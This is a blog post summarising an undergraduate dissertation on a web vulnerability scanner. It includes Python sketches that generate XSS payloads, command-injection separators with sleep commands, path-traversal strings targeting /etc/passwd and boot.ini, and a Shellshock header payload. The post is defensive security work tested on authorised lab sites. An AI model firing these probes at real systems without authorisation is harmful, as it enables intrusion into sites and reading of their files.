Presenting: Pinpoint
A Web Application Vulnerability Scanner.
My full dissertation is available here.
Web-applications are often subject to attacks from hackers for a variety of reasons, from gathering data stored by the website to replacing files served with malicious ones. There is a large range of well-known vulnerabilities in web-applications that can be used to attack a site, and it is vital that these are detected before they are exploited. In my undergraduate dissertation, I created Pinpoint: a web-application vulnerability scanner for automated detection and reporting of common website vulnerabilities.
Design
The Object Oriented Approach
The main focus for my scanner was extensibility. Making the scanner easy to extend means more vulnerability tests can be added over time, widening its scope. Using OOP makes this much easier, as the core scanner can be designed to interact with abstract Exploits and VulnReports, while the specific vulnerabilities simply have to implement these classes. Thanks to the OO approach, supporting a new vulnerability requires only a small amount of code to be added to the core of the scanner.
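To make the idea concrete, here is a minimal sketch of what such a design could look like. It is not Pinpoint's actual code: the Scanner class, the method names (test, render, scan) and the report fields are all assumptions made for illustration; only the names Exploit and VulnReport come from the design described above.

```python
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class VulnReport:
    """Base report; a specific vulnerability could subclass this (fields are hypothetical)."""
    url: str
    parameter: str
    payload: str

    def render(self) -> str:
        return f"{type(self).__name__}: {self.parameter!r} at {self.url} via {self.payload!r}"


class Exploit(ABC):
    """One vulnerability test. The core only ever talks to this interface."""

    @abstractmethod
    def test(self, url: str, parameter: str) -> List[VulnReport]:
        """Return one report per vulnerability found on this input."""


class Scanner:
    """Hypothetical core: runs every registered Exploit against every input."""

    def __init__(self, exploits: List[Exploit]):
        self.exploits = exploits

    def scan(self, inputs: List[Tuple[str, str]]) -> List[VulnReport]:
        reports: List[VulnReport] = []
        for url, parameter in inputs:
            for exploit in self.exploits:
                reports.extend(exploit.test(url, parameter))
        return reports
```

With this shape, adding a new vulnerability test means writing one new Exploit subclass and registering it; the scanning loop itself does not change.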
Exploration
The core of any scanner is a crawler: a program to systematically visit all pages of a website and grab the required information. In this case, the crawler will be gathering all of the possible inputs to the site - all fillable forms and parameters passed via the URL - as we will be testing each of these for vulnerabilities. This information can be neatly wrapped up in Locator objects, fitting with our overall object-oriented approach.
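As a rough illustration of the input-gathering step, the sketch below pulls URL parameters and form fields out of a single page using only the Python standard library. The Locator fields (url, method, inputs) and the find_locators helper are assumptions of mine, not the real Pinpoint classes, and a real crawler would also need to follow links and deduplicate pages.

```python
from dataclasses import dataclass, field
from html.parser import HTMLParser
from typing import List
from urllib.parse import parse_qs, urljoin, urlsplit


@dataclass
class Locator:
    """Hypothetical shape: where an input lives and which named fields it accepts."""
    url: str
    method: str
    inputs: List[str] = field(default_factory=list)


class _FormParser(HTMLParser):
    """Collects one Locator per <form>, with the names of its fillable fields."""

    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.locators: List[Locator] = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = Locator(
                url=urljoin(self.base_url, attrs.get("action") or ""),
                method=(attrs.get("method") or "get").upper(),
            )
        elif tag in ("input", "textarea", "select"):
            # Unnamed fields (e.g. a bare submit button) are never sent, so skip them.
            if self._current is not None and attrs.get("name"):
                self._current.inputs.append(attrs["name"])

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.locators.append(self._current)
            self._current = None


def find_locators(page_url: str, html: str) -> List[Locator]:
    """Return Locators for the URL's query parameters and for every form in the page."""
    locators: List[Locator] = []
    query = parse_qs(urlsplit(page_url).query, keep_blank_values=True)
    if query:
        locators.append(Locator(page_url.split("?")[0], "GET", list(query)))
    parser = _FormParser(page_url)
    parser.feed(html)
    return locators + parser.locators
```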
Fingerprinting
Fingerprinting allows us to reduce the amount of work required to detect vulnerabilities by identifying information about the site.
One useful piece of information is the operating system of the web server. Many payloads, especially with command injection and the UNIX-specific shellshock vulnerability, will only work on certain OSes, and identifying which OS we are targeting allows these platform-specific attacks to be skipped. OS fingerprinting can be done through a variety of methods, but by far the easiest is banner grabbing. In this method, we request the headers of the website, then look through them for information about the OS. It is likely that the server header will declare this information: for example, server: Apache (Ubuntu) allows us to identify a Linux server and ignore all Windows-specific attacks.
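A banner check along these lines can be very small. The sketch below assumes the response headers have already been fetched and are available as a dictionary; the hint lists and the guess_os name are illustrative guesses rather than the lists Pinpoint uses.

```python
from typing import Mapping, Optional

# Illustrative substrings only; a real list would be longer.
_OS_HINTS = {
    "linux": ("ubuntu", "debian", "centos", "red hat", "fedora", "unix"),
    "windows": ("win32", "win64", "microsoft-iis", "windows"),
}


def guess_os(headers: Mapping[str, str]) -> Optional[str]:
    """Guess the server OS from banner headers, or return None if nothing matches."""
    banner = ""
    for name, value in headers.items():
        # Header names are case-insensitive, so normalise before comparing.
        if name.lower() in ("server", "x-powered-by"):
            banner += " " + value.lower()
    for os_name, hints in _OS_HINTS.items():
        if any(hint in banner for hint in hints):
            return os_name
    return None
```

When the result is None, the safe choice is to run the payloads for every platform rather than skip any.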
Some vulnerabilities require specific behaviour from a site to be able to function. For example, XSS attacks rely on user input appearing on the website after being sent, and so we can add a simple test request which discovers the fields reflected to the website. This avoids testing any inputs which do not reflect input back to the user.
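A reflection test of this kind could be sketched as follows. The send callable stands in for whatever submits the form and returns the response body; it and the function name are assumptions for the sake of a self-contained example.

```python
import uuid
from typing import Callable, Dict, List


def reflected_fields(fields: List[str], send: Callable[[Dict[str, str]], str]) -> List[str]:
    """Submit a unique harmless marker in each field and report which ones come back."""
    markers = {name: uuid.uuid4().hex for name in fields}
    body = send(markers)  # hypothetical: submits the values, returns the response body
    return [name for name, marker in markers.items() if marker in body]
```

Only the fields returned here would then be passed on to the XSS tests.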
Exploitation and report(ation)
Each vulnerability tested for by Pinpoint has a dedicated Exploit module. In general, these test for the presence of a vulnerability by submitting test strings to the inputs discovered during exploration, attempting to trigger the vulnerability in some benign way. The module then checks if the vulnerability was exploited: this could be part of the response, a metric such as time taken, or an event triggered inside of a browser instance. Any vulnerabilities discovered will generate an associated VulnReport object, which encapsulates the relevant information and will print out a report when Pinpoint terminates.
Meet the vulnerabilities
Cross Site Scripting (XSS)
XSS is a vulnerability allowing an attacker to provide arbitrary JavaScript to a web page, which is then served to unsuspecting visitors of the page and run in their browser. It can be used to steal cookies, run keyloggers and phishing attacks in the browser, or launch further attacks through dedicated XSS frameworks.
There are three main variants of this vulnerability: reflected XSS, stored (or “persistent”) XSS, and DOM XSS.
In reflected XSS, an HTTP request causes JavaScript to be run on the resulting page. Commonly, malicious JavaScript will be obfuscated, added to a URL as part of a GET request, and sent to users in a phishing attack. This can occur whenever a user supplied value appears unfiltered, or improperly filtered, in the resulting page.
In persistent XSS, JavaScript can be submitted to a page which is stored on the website indefinitely. Any user visiting the page unknowingly runs the malicious code, which makes this a more dangerous form of XSS. This is possible anywhere unfiltered input is stored and later shown on a site — common examples are comment or review forms.
In DOM XSS, the malicious code is not part of the raw HTML of our page, but instead is loaded into the DOM at parse time - for example, JavaScript can be included in the URL, and if the code that runs as a result evaluates document.URL at run-time, the malicious code will be executed without it appearing on the page. This is a niche method for exploiting XSS and nowadays is prevented by the browser, and so I have not implemented detection of DOM XSS within Pinpoint.
Pinpoint detects XSS by attempting to inject a JavaScript alert into the page. A browser instance is then able to see the alert and any text in it, which can be used to confirm the presence of a vulnerability. To avoid false positives, Pinpoint will set the alert text to a new UUID4 for each test that it runs, ensuring any alert seen is a result of the current test.
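The UUID trick is simple to sketch. The function names below are hypothetical, and the browser side is left out: with Selenium, the text of an open alert can be read through driver.switch_to.alert.text, and that value is what would be passed in as seen_alert_text.

```python
import uuid
from typing import Optional, Tuple


def new_alert_test() -> Tuple[str, str]:
    """Return a fresh token and the JavaScript that raises an alert containing it."""
    token = str(uuid.uuid4())
    return token, f"alert('{token}')"


def alert_confirms(token: str, seen_alert_text: Optional[str]) -> bool:
    """Only an alert carrying this test's own token counts as a hit."""
    return seen_alert_text == token
```

An alert left over from an earlier test, or one raised by the site itself, carries different text and is therefore ignored.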
Alerts on their own are unlikely to trigger, and so we should attempt to inject HTML into the page which will trigger the alert. There are many, many ways of achieving this, and Pinpoint uses a small subset of these, including <script> tags, injection through images and SVGs, and an XSS polyglot which should execute in many different contexts.
Our payload may be rendered into the HTML, but not in a place that is useful - it may be surrounded by quotes, or a CSS block instead of HTML. We can prefix our payload with a variety of escapes to try and inject our payload outside of the restricted place that it is reflected into.
We may also face some less-than-perfect filtering in place against XSS. Although proper XSS prevention is available in many systems, such as PHP's htmlspecialchars, some sites will attempt to filter out XSS themselves. We can try to evade this filtering by encoding our payload, such as by using variations of URL encoding or other encodings like base64.
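The three ideas above (HTML wrappers that trigger the script, prefixes that escape the surrounding context, and encoded variants) combine naturally into a payload generator. The sketch below shows that combination; the specific wrappers and escape strings are a small illustrative selection of mine, not Pinpoint's actual payload list.

```python
from itertools import product
from typing import Iterator
from urllib.parse import quote

# Ways of getting the JavaScript to run once the HTML is rendered.
WRAPPERS = [
    "<script>{js}</script>",
    "<img src=x onerror={js}>",
    "<svg onload={js}>",
]

# Prefixes that try to close whatever context the input is reflected into.
ESCAPES = ["", '">', "'>", "</style>", "</textarea>"]


def xss_payloads(js: str) -> Iterator[str]:
    """Yield each escape/wrapper combination raw, URL-encoded, and double URL-encoded."""
    for escape, wrapper in product(ESCAPES, WRAPPERS):
        raw = escape + wrapper.format(js=js)
        yield raw
        once = quote(raw, safe="")
        yield once
        yield quote(once, safe="")
```

Even these small lists give 45 payloads per input, which is one reason the reflection check during fingerprinting is worth doing first.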
Command Injection
There are various situations in which it is easier to use a command line tool than to implement some functionality in a program. For example, the easiest way to check if a website is up is to call ping www.mywebsite.com and see if there is a response. Many programming languages provide means to run command line tools, through calls such as system("command"), exec("command") or `command` (backticks). This is a useful feature, but poses a security vulnerability if any user supplied input is given to this command, as it becomes possible for a user to run their own commands through the server. This vulnerability is command injection.
Pinpoint uses two methods to detect command injection: web request injection, and timeout injection. In the first case, we will gather our public IP and attempt to make the website send a web request to a local webserver. A hit on our server containing the unique test UUID will confirm the presence of a vulnerability. This won't work if we are behind a NAT, as the request will not make it to our machine (without setting up port forwarding). The alternative detection method is then timeout injection, in which we force the server to sleep for several seconds before replying to our request. A significantly slower response time than initially tested for will indicate a vulnerability. This method can lead to more false positives, as network traffic or server load impacts the response time, and so tests are repeated to demonstrate a consistent slowdown from our payloads.
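The timing check can be sketched as below. Taking the median of a few repeats is one simple way to dampen network noise; the repeat count, the tolerance value and the function names are assumptions of this sketch, and request stands in for whatever sends the HTTP request.

```python
import statistics
import time
from typing import Callable


def median_time(request: Callable[[], object], repeats: int = 3) -> float:
    """Run the request several times and return the median duration in seconds."""
    samples = []
    for _ in range(repeats):
        start = time.perf_counter()
        request()
        samples.append(time.perf_counter() - start)
    return statistics.median(samples)


def looks_delayed(baseline: float, injected: float, sleep_seconds: float,
                  tolerance: float = 0.8) -> bool:
    """True if the injected request was slower by most of the requested sleep."""
    return injected - baseline >= sleep_seconds * tolerance
```

For example, with a 0.2s baseline and a payload asking for a 5 second sleep, a 5.3s median would be flagged while a 0.9s median would not.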
We will exploit command injection differently on UNIX and Windows systems, due to the difference in the shell language that we will be injecting into. On UNIX, we are most likely to be using Bash, whereas Windows will use CMD or PowerShell. While some payloads will be OS agnostic (such as those using universal command line tools like curl or wget), we will have to vary the payloads we use in other cases, such as sleep vs timeout. We may also have additional payloads that we can use on some platforms, such as Invoke-WebRequest within PowerShell.
As with XSS, we may want to encode our payload to execute commands in certain environments. We can use a variety of command separators such as ||, &&, and newlines to attempt to separate our command from the command our payload is attached to. We can also wrap the command in syntax to execute it inside of the other command, such as backticks or $(payload).
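Putting the OS split and the separators together, a payload generator for the timing test might look like the sketch below. The function name and the exact command strings are assumptions; in particular, timeout /T is used here only because the text contrasts sleep with timeout, and it may not behave the same way in every non-interactive Windows context.

```python
from typing import List

# Separators named in the text: they end or chain the original command.
SEPARATORS = ["||", "&&", "\n"]

# Substitution syntax understood by Bash-like shells only.
UNIX_WRAPPERS = ["`{cmd}`", "$({cmd})"]


def command_payloads(os_name: str, seconds: int = 5) -> List[str]:
    """Build delay payloads for the given OS ('windows' or anything else for UNIX)."""
    if os_name == "windows":
        cmd = f"timeout /T {seconds}"
    else:
        cmd = f"sleep {seconds}"
    payloads = [f"{sep} {cmd}" for sep in SEPARATORS]
    if os_name != "windows":
        payloads += [wrapper.format(cmd=cmd) for wrapper in UNIX_WRAPPERS]
    return payloads
```

If fingerprinting could not identify the OS, both lists would simply be tried.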
Code Injection
Similarly to command injection, it might be useful to dynamically evaluate some code at runtime. Programming languages have functions such as eval to do this - however, if user input is part of the code being evaluated, it is possible to inject code into the system. There are also additional vulnerabilities in specific languages - for example, one of the two versions of Perl's open function will use the command line, and pipe the result into the file handle. This allows code to be injected into the file path, and executed through Perl.
Code injection could be detected by writing a semi-complex payload in each language you aim to detect an injection into; however, it is generally easier to escalate code injection to command injection. This can be easily accomplished by using system, exec and similar functions present in many programming languages, followed by the same tests as in command injection. In hindsight, it would make more sense to combine code and command injection scanning and avoid trying to distinguish them. However, as this is a dissertation project with specific goals that must be achieved separately, I have kept these as two separate modules for now.
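The escalation step amounts to wrapping a shell command in each language's "run a command" call. A minimal sketch, with an illustrative choice of languages and a hypothetical function name:

```python
from typing import Dict

# One snippet per target language that hands {cmd} to the system shell.
CODE_TEMPLATES = {
    "php": "system('{cmd}');",
    "python": "__import__('os').system('{cmd}')",
    "perl": "system('{cmd}');",
    "ruby": "system('{cmd}')",
}


def escalate_to_command(cmd: str) -> Dict[str, str]:
    """Wrap a shell command (assumed to contain no single quotes) for each language."""
    return {lang: template.format(cmd=cmd) for lang, template in CODE_TEMPLATES.items()}
```

Each resulting string can then go through the same timing or web request checks as an ordinary command injection payload.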
Path Traversal
Websites sometimes provide an interface to access different files on the website to allow users to browse directories of uploaded files, for example. However, if the proper restrictions are not in place, a user can escape the chosen directory and traverse the full file system of the web server. This is known as path traversal, and it can lead to various information being leaked and sensitive files accessed.
We can detect path traversal by searching for world-readable files in standard locations: on UNIX, this is /etc/passwd, and on Windows I have chosen boot.ini. We can then use regular expressions to match on the format of these specific files to see if we have managed to open them. Our payloads will be these file paths, prefixed with various ways of going up a directory (UNIX has the shortcut of being able to start a path with /, but if this fails then repeated ../'s are used).
Some paths may be filtered, and so we can use URL encoding to attempt to get around this. There are variations on URL encoding we can also use, such as double URL encoding (%252e -> %2e -> .) or alternate versions of characters from abusing Unicode through overlong UTF-8 sequences (%2e = %c0%ae = %e0%80%ae = %f0%80%80%ae).
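The payload construction and the regular expression check could be sketched like this. The regexes, the depth limit and the function names are my own illustrative choices, and only the plain, URL-encoded and double URL-encoded variants are generated here (no overlong UTF-8 forms).

```python
import re
from typing import Iterator, Optional

# A passwd entry has seven colon-separated fields with numeric UID and GID.
PASSWD_RE = re.compile(r"[\w.-]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n<]*")
# boot.ini starts with a [boot loader] section.
BOOT_INI_RE = re.compile(r"\[boot loader\]", re.IGNORECASE)


def traversal_payloads(target: str = "/etc/passwd", max_depth: int = 6) -> Iterator[str]:
    """Yield the absolute path, then ../ chains in raw, encoded and double-encoded form."""
    yield target
    relative = target.lstrip("/")
    for depth in range(1, max_depth + 1):
        raw = "../" * depth + relative
        yield raw
        encoded = raw.replace(".", "%2e").replace("/", "%2f")
        yield encoded
        yield encoded.replace("%", "%25")


def leaked_file(body: str) -> Optional[str]:
    """Return which known file the response appears to contain, if any."""
    if PASSWD_RE.search(body):
        return "/etc/passwd"
    if BOOT_INI_RE.search(body):
        return "boot.ini"
    return None
```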
Shellshock
Shellshock is a vulnerability in old versions of Bash in which a user defined environment variable can be used to run arbitrary commands. When a new instance of Bash is created, Bash looks through the table of environment variables for any encoded scripts, creates a command that defines these scripts and then runs the command. In CVE-2014-6271, it was discovered that any trailing strings after a function defined in an environment variable are executed when Bash parses the environment variable table. As such, anyone with the ability to define environment variables could run arbitrary code on the server. Even though this is an old vulnerability, it can still be found on some IoT devices nowadays, and it is still worth checking for.
Shellshock is exploited slightly differently to other vulnerabilities targeted by Pinpoint: instead of using form submission, Shellshock payloads are injected into the headers of certain pages of a site. This includes the cookie, user agent, and referer, although it is sometimes also possible to define additional non-standardised headers to inject into. Shellshock can be used to run any command, but the simplest one to detect is just an echo which will add a new header to the HTTP response. By using a UUID as the new header name and the parameter we injected into as the value, we can guarantee no false positives when looking for cases of Shellshock.
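A probe following this scheme could be built as in the sketch below. The function names are hypothetical, the UUID is used in its hex form so that it is a valid header name, and actually sending the request is left to whatever HTTP client is in use.

```python
import uuid
from typing import Dict, Mapping, Tuple


def shellshock_probe(header: str) -> Tuple[str, Dict[str, str]]:
    """Return a fresh marker and the request header carrying the Shellshock payload."""
    marker = uuid.uuid4().hex
    # Function definition followed by a trailing command: the echo output would
    # land in the CGI response headers as "<marker>: <injected header name>".
    payload = "() { :; }; echo '%s: %s'" % (marker, header)
    return marker, {header: payload}


def is_vulnerable(marker: str, header: str, response_headers: Mapping[str, str]) -> bool:
    """True if the response contains our marker header naming the injected header."""
    lowered = {name.lower(): value for name, value in response_headers.items()}
    return lowered.get(marker.lower()) == header
```

Because the value names the header that was injected into, a single response also tells us which header was the vulnerable one.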
Performance
Overall, Pinpoint performs well, finding a large number of vulnerabilities across a range of test vulnerable websites. The most notable statistics from the evaluation of this project were finding all code injection, path traversal, and shellshock vulnerabilities on the tested sites, as well as an f-measure of 0.983 for command injection. Unfortunately, the XSS performance is much worse, achieving only 0.591 as the f-measure. Although this XSS performance is comparable to other many-vulnerability scanners such as ZAProxy, it falls behind W3AF, and far behind any specialised XSS scanner. Given the scope of this project, this is acceptable, although it suggests that the XSS module should likely be reworked in the future.
There are some points worth mentioning about the statistics for these tests:
- There are far more XSS cases present on these sites than other vulnerabilities. There were 181 XSS vulnerabilities, 30 command injections, 4 code injections, 7 path traversals and 4 shellshock instances. This makes the XSS statistics more reliable than the others, although e.g. shellshock does cover all of the ways a system can be vulnerable, despite the minuscule number of tests.
- These test sites are all intentionally made vulnerable, and these statistics may not properly reflect performance on live websites. On the other hand, for compliance with the Computer Misuse Act, I can only test on sites I am authorised to, and it is easier to host intentionally vulnerable sites running in VMs than to find live sites willing to let me run new software on them.
- As these sites are running in Linux VMs, there is no proper performance comparison between Linux and Windows systems. This is mostly impactful for the command injection and path traversal cases, where different tests would be run on different operating systems - although I have not been able to properly test the Windows cases.
In summary
The project was an overall success. All of the success criteria were achieved: develop a site crawler, XSS and command injection scanners, and report the vulnerabilities. Furthermore, three of six planned extensions were implemented: code injection, path traversal, and Shellshock scanners. I consider the high performance of the latter four tests to be a great success for the project, although the XSS scanner falls behind.
There are various changes I would make in hindsight:
- I would have spent more time researching a browser framework to use. I chose Selenium due to my prior experience with it, but this is far from what Selenium is designed for and there are various issues in the project from this choice.
- Existing scanners rarely differentiate between command and code injection, and indeed my method of detecting code injection is to escalate to command injection. As such, it would likely be better to combine the two types of attack in the future, putting all of the code injection payloads into the command injection module.
- The XSS scanner should use a different method for detecting vulnerabilities. Although the browser alert approach works, the performance is far worse than other scanners, and using a method from a specialised scanner would have been a better choice.
The system has been designed for extensibility, and hence new vulnerability tests could easily be added to it in the future for vulnerabilities such as SQL injection and XML injection. The additional tests could make this scanner more comparable to existing scanners, which commonly test for tens of vulnerabilities rather than five. Improvements could also be made to the scanner core: it is currently barely parallelised, and running tests in parallel would enable a large speedup in the scanner’s operation. Furthermore, converting to a different browser framework would allow for a higher XSS discovery rate, and making a crawler that uses a headless browser would also allow for the project to be adaptable to more modern JavaScript-heavy sites.
Overall, I'm quite happy with how this turned out, and 68/100 is a pretty good grade for a dissertation :)